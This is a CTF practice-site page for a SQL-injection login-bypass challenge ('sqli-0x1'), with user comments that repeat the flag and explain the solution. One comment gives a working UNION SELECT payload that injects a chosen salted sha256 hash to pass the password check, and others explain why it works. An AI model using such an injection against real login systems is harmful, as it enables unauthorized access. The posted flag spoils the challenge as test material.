sqli-0x1WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 625
提  示:
描  述:
SQL injections are still a problem yes, even in 2021. Bypass the login mechanism and get access to the admin area.
评论
xzs297995 5天前

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

zjd168 7天前

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

17743520638 1月前

这道题非常有意思

回复 0

meilanzhuju 2月前

五边形战士

回复 0

波光摇曳 3月前

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

差距从何而起 3月前

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

lzq2000 4月前

<?php echo hash(“sha256”, “123”.“456”);?> 得到 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92 123是口令,456是盐

回复 1
xzs297995 5天前

@234722457 2a8610aefdd0028c6bf074dd18721c0ef8bc43241cc7a653d7aedf2036bdf6b3$654应该是这个 而且密码是987

回复 0

在浅水中溺水么? 1月前

@234722457 987654要换成2a8610aefdd0028c6bf074dd18721c0ef8bc43241cc7a653d7aedf2036bdf6b3

回复 0

234722457 3月前

大佬,不用 123456 用 987654 为什么失败啊

回复 0

lzq2000 4月前

查询一个不存在的账号,拼接union select,将自定义的密码和盐生成的加密字符串注入,覆盖密码查询结果,使用自定义的密码即可通过密码校验,post发送: user=a'union select 1,'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456'--+&pass=123

回复 6
2957632449 17天前

佬 这边1,'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456' 这一串 会自动新建一个结果集是吗 然后'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456'这边代表的是字段password里的值对吗

回复 0

TwTsaltfish 1月前

@Am0s 3、源码中验证sha256(明文密码$pass+$result["password"]中$后的字符串【$salt】)=$result["password"]中$前的值

回复 0

TwTsaltfish 1月前

@Am0s 1、猜测原先就是两个字段、账号密码,正常情况下搜到的就是这两个字段$result["user"],$result["password"];2、查询一个不存在的账号,没有union会是空的,union查询得到的第二个值(这里如果有多个无用字段要测试哪个是密码)会作为$result["password"]进入后面的逻辑;3、源码中验证sha2

回复 0

Am0s 2月前

大佬能讲解一下原理吗

回复 0

JJhello 4月前

不太懂,来个大佬讲解一下

回复 0

yituoshi 5月前

Half the truth is often a big lie:Welcome back admin! Have a flag: shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591

回复 0

WriteUp

image
a2cai

2 金币

评分(13)

解题动态

HONMOO 攻破了该题 17分钟前
YUjunbAO36 攻破了该题 19小时前
macleo 攻破了该题 21小时前
天天171717 攻破了该题 22小时前
菜狗打比赛 攻破了该题 23小时前
Zt0312 攻破了该题 2天前
mumusan666 攻破了该题 2天前
lq61618 攻破了该题 2天前
LostDawn 攻破了该题 2天前
不太聪明 攻破了该题 2天前
yoga 攻破了该题 2天前
xjc7580 攻破了该题 3天前
15292582842 攻破了该题 3天前
冰糖葫芦 攻破了该题 3天前
admining 攻破了该题 3天前
huang2020 攻破了该题 3天前
Aimerzz 攻破了该题 3天前
lifei 攻破了该题 3天前
zyc6 攻破了该题 3天前
ylne 攻破了该题 3天前